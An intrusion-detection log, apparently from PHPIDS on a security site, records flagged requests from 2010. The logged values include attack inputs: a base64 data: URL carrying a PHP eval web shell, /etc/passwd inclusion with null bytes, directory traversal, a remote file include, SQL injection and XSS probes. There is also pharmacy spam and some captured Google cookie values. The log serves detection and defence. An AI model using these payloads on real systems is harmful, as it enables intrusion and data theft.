Name:REQUEST.page
Value:videos/pn12/i.php?page=mobile-device-hacking
Page:/i.php?page=videos/pn12/i.php?page=mobile-device-hacking
IP:184.73.16.1
Impact:10
Created:2010-05-01 06:09:31
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:123144
Name:GET.page
Value:videos/pn12/i.php?page=mobile-device-hacking
Page:/i.php?page=videos/pn12/i.php?page=mobile-device-hacking
IP:184.73.16.1
Impact:10
Created:2010-05-01 06:09:31
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:123145
Name:REQUEST.page
Value:videos/pn12/i.php?page=books
Page:/i.php?page=videos/pn12/i.php?page=books
IP:184.73.16.1
Impact:10
Created:2010-05-01 06:09:31
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:123146
Name:GET.page
Value:videos/pn12/i.php?page=books
Page:/i.php?page=videos/pn12/i.php?page=books
IP:184.73.16.1
Impact:10
Created:2010-05-01 06:09:31
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:123141
Name:REQUEST.codeme
Value:Your Site Is Great!, <a href= http://tramadolmoreaddictingthan.imagekind.com/#1 >tramadol more addicting than vicodin</a> [url=http://tramadolmoreaddictingthan.imagekind.com/#1]tramadol more addicting than vicodin[/url], >:]]],
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-05-01 06:05:41
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123142
Name:POST.codeme
Value:Your Site Is Great!, <a href= http://tramadolmoreaddictingthan.imagekind.com/#1 >tramadol more addicting than vicodin</a> [url=http://tramadolmoreaddictingthan.imagekind.com/#1]tramadol more addicting than vicodin[/url], >:]]],
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-05-01 06:05:41
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123139
Name:REQUEST.codeme
Value::-(, <a href= http://cialisinjuryattorneyohio.imagekind.com/#1 >cialis injury attorney ohio for you</a> [url=http://cialisinjuryattorneyohio.imagekind.com/#1]cialis injury attorney ohio for you[/url], qqn,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-05-01 05:15:48
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:123140
Name:POST.codeme
Value::-(, <a href= http://cialisinjuryattorneyohio.imagekind.com/#1 >cialis injury attorney ohio for you</a> [url=http://cialisinjuryattorneyohio.imagekind.com/#1]cialis injury attorney ohio for you[/url], qqn,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:40
Created:2010-05-01 05:15:48
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((+::

ID:123137
Name:REQUEST.page
Value:../sigs/logo.php
Page:/i.php?page=../sigs/logo.php
IP:67.195.111.36
Impact:10
Created:2010-05-01 04:45:29
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10

ID:123138
Name:GET.page
Value:../sigs/logo.php
Page:/i.php?page=../sigs/logo.php
IP:67.195.111.36
Impact:10
Created:2010-05-01 04:45:29
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10

ID:123135
Name:REQUEST.codeme
Value:Give somebody the to a site about the, <a href= http://howlongdoesittakecialisto.imagekind.com/ >how long does it take cialis to work</a>, [url= http://howlongdoesittakecialisto.imagekind.com/ ]how long does it take cialis to work[/url], fuyc,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-05-01 04:26:13
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:123136
Name:POST.codeme
Value:Give somebody the to a site about the, <a href= http://howlongdoesittakecialisto.imagekind.com/ >how long does it take cialis to work</a>, [url= http://howlongdoesittakecialisto.imagekind.com/ ]how long does it take cialis to work[/url], fuyc,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-05-01 04:26:13
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:123133
Name:REQUEST.page
Value:backtrack-3'-man/nemesis-ip
Page:/i.php?page=backtrack-3'-man/nemesis-ip
IP:123.17.177.94
Impact:14
Created:2010-05-01 04:11:24
Details:
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123134
Name:GET.page
Value:backtrack-3'-man/nemesis-ip
Page:/i.php?page=backtrack-3'-man/nemesis-ip
IP:123.17.177.94
Impact:14
Created:2010-05-01 04:11:24
Details:
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123131
Name:REQUEST.page
Value:/?a=or1=1--
Page:/i.php?page=/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-01 03:29:59
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123132
Name:GET.page
Value:/?a=or1=1--
Page:/i.php?page=/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-01 03:29:59
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123129
Name:REQUEST.codeme
Value:Help me to find the, <a href= http://willxanaxandoxycodoneshow.imagekind.com/#1 >Real will xanax and oxycodone show up in a hair drug test</a> [url=http://willxanaxandoxycodoneshow.imagekind.com/#1]Real will xanax and oxycodone show up in a hair drug test[/url], 7014,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-05-01 01:56:13
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123130
Name:POST.codeme
Value:Help me to find the, <a href= http://willxanaxandoxycodoneshow.imagekind.com/#1 >Real will xanax and oxycodone show up in a hair drug test</a> [url=http://willxanaxandoxycodoneshow.imagekind.com/#1]Real will xanax and oxycodone show up in a hair drug test[/url], 7014,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-05-01 01:56:13
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123127
Name:REQUEST.page
Value:backtrack-3 and 0=1 union select -man/nemesis-ip
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip
IP:123.26.124.59
Impact:20
Created:2010-05-01 01:55:14
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123128
Name:GET.page
Value:backtrack-3 and 0=1 union select -man/nemesis-ip
Page:/i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip
IP:123.26.124.59
Impact:20
Created:2010-05-01 01:55:14
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123125
Name:REQUEST.page
Value:security/usb-hardware-keyloggers-1 and 0=1 union select -keycarbon
Page:/i.php?page=security/usb-hardware-keyloggers-1+and+0=1+union+select+-keycarbon
IP:123.26.124.59
Impact:20
Created:2010-05-01 01:54:56
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123126
Name:GET.page
Value:security/usb-hardware-keyloggers-1 and 0=1 union select -keycarbon
Page:/i.php?page=security/usb-hardware-keyloggers-1+and+0=1+union+select+-keycarbon
IP:123.26.124.59
Impact:20
Created:2010-05-01 01:54:56
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123123
Name:REQUEST.page
Value:http://www.reiluke.site90.com/index.php?security/hackingillustrated
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated
IP:88.235.120.134
Impact:10
Created:2010-05-01 01:49:13
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123124
Name:GET.page
Value:http://www.reiluke.site90.com/index.php?security/hackingillustrated
Page:/i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated
IP:88.235.120.134
Impact:10
Created:2010-05-01 01:49:13
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123121
Name:REQUEST.codeme
Value:Very interesting sites., <a href= http://howmanydaysdoesxanaxstayi.imagekind.com/#1 >Only how many days does xanax stay in your system</a> [url=http://howmanydaysdoesxanaxstayi.imagekind.com/#1]Only how many days does xanax stay in your system[/url], jxxvg,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:34
Created:2010-05-01 00:15:40
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects possible event handlers | Tags: xss, csrf | ID: 32
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123122
Name:POST.codeme
Value:Very interesting sites., <a href= http://howmanydaysdoesxanaxstayi.imagekind.com/#1 >Only how many days does xanax stay in your system</a> [url=http://howmanydaysdoesxanaxstayi.imagekind.com/#1]Only how many days does xanax stay in your system[/url], jxxvg,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:34
Created:2010-05-01 00:15:40
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects possible event handlers | Tags: xss, csrf | ID: 32
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123119
Name:REQUEST.codeme
Value:It is a very good thing, <a href= http://doesxanaxshowupondrugtest.imagekind.com/ >does xanax show up on drug tests</a>, [url= http://doesxanaxshowupondrugtest.imagekind.com/ ]does xanax show up on drug tests[/url], >:OO,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-30 23:25:36
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:123120
Name:POST.codeme
Value:It is a very good thing, <a href= http://doesxanaxshowupondrugtest.imagekind.com/ >does xanax show up on drug tests</a>, [url= http://doesxanaxshowupondrugtest.imagekind.com/ ]does xanax show up on drug tests[/url], >:OO,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-30 23:25:36
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:123117
Name:REQUEST.test
Value:"><script>eval(window.name)</script>
Page:/i.php?test=%22%3e%3cscript%3eeval(window.name)%3c/script%3e
IP:67.195.111.36
Impact:72
Created:2010-04-30 21:43:11
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects url-, name-, JSON, and referrer-contained payload attacks | Tags: xss, csrf | ID: 4
Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123118
Name:GET.test
Value:"><script>eval(window.name)</script>
Page:/i.php?test=%22%3e%3cscript%3eeval(window.name)%3c/script%3e
IP:67.195.111.36
Impact:72
Created:2010-04-30 21:43:11
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects url-, name-, JSON, and referrer-contained payload attacks | Tags: xss, csrf | ID: 4
Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID: 17
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123113
Name:REQUEST.PREF
Value:ID=f04db74a53951081:TM=1272687615:LM=1272687615:S=mMjEtv4FpHxlTMtl
Page:/i.php?page=videos/recovercookies
IP:155.246.12.164
Impact:30
Created:2010-04-30 21:18:33
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:123114
Name:REQUEST.domain
Value:.google.com, NID=34=qCpL-sT3NYfpft2SfdyBXO08MXB9t1nlXQ5OCtu429nYpCbKZI-NLQikiPE5QG3ejeAs2a1QjUKflwdjHwHJ66CA4KtL1xcPPbp-VqUGpS0zh_1m6IqudIuD0GrbPWb9
Page:/i.php?page=videos/recovercookies
IP:155.246.12.164
Impact:30
Created:2010-04-30 21:18:33
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:123115
Name:COOKIE.PREF
Value:ID=f04db74a53951081:TM=1272687615:LM=1272687615:S=mMjEtv4FpHxlTMtl
Page:/i.php?page=videos/recovercookies
IP:155.246.12.164
Impact:30
Created:2010-04-30 21:18:33
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:123116
Name:COOKIE.domain
Value:.google.com, NID=34=qCpL-sT3NYfpft2SfdyBXO08MXB9t1nlXQ5OCtu429nYpCbKZI-NLQikiPE5QG3ejeAs2a1QjUKflwdjHwHJ66CA4KtL1xcPPbp-VqUGpS0zh_1m6IqudIuD0GrbPWb9
Page:/i.php?page=videos/recovercookies
IP:155.246.12.164
Impact:30
Created:2010-04-30 21:18:33
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:123111
Name:REQUEST.codeme
Value:Hi, <a href= http://whatisthedifferencebetw.imagekind.com/#1 >what is the difference between ativan and xanax information</a> [url=http://whatisthedifferencebetw.imagekind.com/#1]what is the difference between ativan and xanax information[/url], ajfu,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-30 20:55:57
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123112
Name:POST.codeme
Value:Hi, <a href= http://whatisthedifferencebetw.imagekind.com/#1 >what is the difference between ativan and xanax information</a> [url=http://whatisthedifferencebetw.imagekind.com/#1]what is the difference between ativan and xanax information[/url], ajfu,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-30 20:55:57
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123109
Name:REQUEST.codeme
Value:<script>alert("test")</script>
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:62.57.16.99
Impact:52
Created:2010-04-30 20:15:53
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43

ID:123110
Name:POST.codeme
Value:<script>alert("test")</script>
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:62.57.16.99
Impact:52
Created:2010-04-30 20:15:53
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: Detects possible includes and typical script methods | Tags: xss, csrf, id, rfe | ID: 16
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43

ID:123107
Name:REQUEST.page
Value:data:;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbY21kXSk7ID8+
Page:/i.php?page=data:;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbY21kXSk7ID8%2b&cmd=phpinfo()
IP:67.195.111.36
Impact:88
Created:2010-04-30 18:22:28
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID: 8
Description: Detects possible includes and packed functions | Tags: xss, csrf, id, rfe | ID: 14
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27
Description: Detects code injection attempts 1/3 | Tags: id, rfe, lfi | ID: 58
Description: Detects code injection attempts 2/3 | Tags: id, rfe, lfi | ID: 59
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1818181818182
Converted: ((((+::

ID:123108
Name:GET.page
Value:data:;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbY21kXSk7ID8+
Page:/i.php?page=data:;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbY21kXSk7ID8%2b&cmd=phpinfo()
IP:67.195.111.36
Impact:88
Created:2010-04-30 18:22:28
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID: 8
Description: Detects possible includes and packed functions | Tags: xss, csrf, id, rfe | ID: 14
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID: 21
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27
Description: Detects code injection attempts 1/3 | Tags: id, rfe, lfi | ID: 58
Description: Detects code injection attempts 2/3 | Tags: id, rfe, lfi | ID: 59
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1818181818182
Converted: ((((+::

ID:123106
Name:GET.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style=%27background-color:yellow%27%3Eusb%3C/span%3E-write-blocker
IP:216.129.119.14
Impact:42
Created:2010-04-30 16:44:13
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123105
Name:REQUEST.page
Value:security/thumbscrew-software-<span style='background-color:yellow'>usb</span>-write-blocker
Page:/i.php?page=security/thumbscrew-software-%3Cspan%20style=%27background-color:yellow%27%3Eusb%3C/span%3E-write-blocker
IP:216.129.119.14
Impact:42
Created:2010-04-30 16:44:12
Details:
Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1
Description: finds malicious attribute injection attempts | Tags: xss, csrf | ID: 69
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:123103
Name:REQUEST.codeme
Value:I like it so much, <a href= http://famousadvertisingslogans.imagekind.com/#1 >famous advertising slogans</a> [url=http://famousadvertisingslogans.imagekind.com/#1]famous advertising slogans[/url], :),
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-30 15:04:50
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123104
Name:POST.codeme
Value:I like it so much, <a href= http://famousadvertisingslogans.imagekind.com/#1 >famous advertising slogans</a> [url=http://famousadvertisingslogans.imagekind.com/#1]famous advertising slogans[/url], :),
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-30 15:04:50
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123101
Name:REQUEST.codeme
Value:Your Site Is Great, <a href= http://freeunlistedphonenumberse.imagekind.com/ >free unlisted phone number search</a>, [url= http://freeunlistedphonenumberse.imagekind.com/ ]free unlisted phone number search[/url], kffb,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-30 13:48:33
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:123102
Name:POST.codeme
Value:Your Site Is Great, <a href= http://freeunlistedphonenumberse.imagekind.com/ >free unlisted phone number search</a>, [url= http://freeunlistedphonenumberse.imagekind.com/ ]free unlisted phone number search[/url], kffb,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:24
Created:2010-04-30 13:48:33
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68

ID:123099
Name:REQUEST.page
Value:backtrack-3-man/dsniff/usr/local/lib/dsniff.magic
Page:/i.php?page=backtrack-3-man/dsniff/usr/local/lib/dsniff.magic
IP:67.195.111.36
Impact:10
Created:2010-04-30 12:12:52
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:123100
Name:GET.page
Value:backtrack-3-man/dsniff/usr/local/lib/dsniff.magic
Page:/i.php?page=backtrack-3-man/dsniff/usr/local/lib/dsniff.magic
IP:67.195.111.36
Impact:10
Created:2010-04-30 12:12:52
Details:
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11

ID:123097
Name:REQUEST.page
Value:/etc/passwd
Page:/i.php?page=/etc/passwd%00
IP:67.195.111.36
Impact:20
Created:2010-04-30 09:46:19
Details:
Description: Detects etc/passwd inclusion attempts | Tags: dt, id, lfi | ID: 12
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123098
Name:GET.page
Value:/etc/passwd
Page:/i.php?page=/etc/passwd%00
IP:67.195.111.36
Impact:20
Created:2010-04-30 09:46:19
Details:
Description: Detects etc/passwd inclusion attempts | Tags: dt, id, lfi | ID: 12
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123095
Name:REQUEST.codeme
Value:What?, <a href= http://freehondaatvservicemanual.imagekind.com/#1 >All about free honda atv service manuals online</a> [url=http://freehondaatvservicemanual.imagekind.com/#1]All about free honda atv service manuals online[/url], rlt,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:36
Created:2010-04-30 09:34:16
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123096
Name:POST.codeme
Value:What?, <a href= http://freehondaatvservicemanual.imagekind.com/#1 >All about free honda atv service manuals online</a> [url=http://freehondaatvservicemanual.imagekind.com/#1]All about free honda atv service manuals online[/url], rlt,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:36
Created:2010-04-30 09:34:16
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123093
Name:REQUEST.codeme
Value:Is it so important?, http://chaseonlinebillpaying.imagekind.com/ chase online bill paying, nbo,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:10
Created:2010-04-30 08:43:54
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7

ID:123094
Name:POST.codeme
Value:Is it so important?, http://chaseonlinebillpaying.imagekind.com/ chase online bill paying, nbo,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:10
Created:2010-04-30 08:43:54
Details:
Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7

ID:123091
Name:REQUEST.page
Value:suckmydick.phpsecurity/hackingillustrated
Page:/i.php?page=suckmydick.php%00security/hackingillustrated
IP:198.145.242.125
Impact:10
Created:2010-04-30 07:56:12
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123092
Name:GET.page
Value:suckmydick.phpsecurity/hackingillustrated
Page:/i.php?page=suckmydick.php%00security/hackingillustrated
IP:198.145.242.125
Impact:10
Created:2010-04-30 07:56:12
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123089
Name:REQUEST.codeme
Value:Good Job, <a href= http://playmonopolyonline.imagekind.com/#1 >play monopoly online free</a> [url=http://playmonopolyonline.imagekind.com/#1]play monopoly online free[/url], 8OO,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-30 07:52:11
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123090
Name:POST.codeme
Value:Good Job, <a href= http://playmonopolyonline.imagekind.com/#1 >play monopoly online free</a> [url=http://playmonopolyonline.imagekind.com/#1]play monopoly online free[/url], 8OO,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-30 07:52:11
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:123087
Name:REQUEST.codeme
